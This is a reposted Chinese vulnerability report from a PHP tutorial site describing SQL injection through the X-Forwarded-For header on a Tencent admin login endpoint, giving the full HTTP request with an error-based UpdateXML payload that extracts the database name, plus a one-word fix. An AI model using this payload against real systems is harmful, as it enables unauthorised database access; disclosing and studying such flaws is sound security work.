网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

腾讯这是一个很经典的SQL注射 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 腾讯-这是一个很经典的SQL注射详细说明:GET site login?jsonpCallbackParam=loginJsonpCallbackdata_info=1ajax=true_=1406730250627 HTTP 1 1Host: admin comic qq comX-FORWARDED-FOR:192 168 1 1+...

腾讯-这是一个很经典的SQL注射

GET /site/login?jsonpCallbackParam=loginJsonpCallback&data_info=1&ajax=true&_=1406730250627 HTTP/1.1


Host: admin.comic.qq.com



X-FORWARDED-FOR:192.168.1.1'+ (UpdateXML(1,CONCAT(0x5b,mid( (select database()) ,1,32),0x5d),1)) +'


http头注入

漏洞证明:

 

2.jpg




 

1.jpg

 

修复方案:

过滤

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论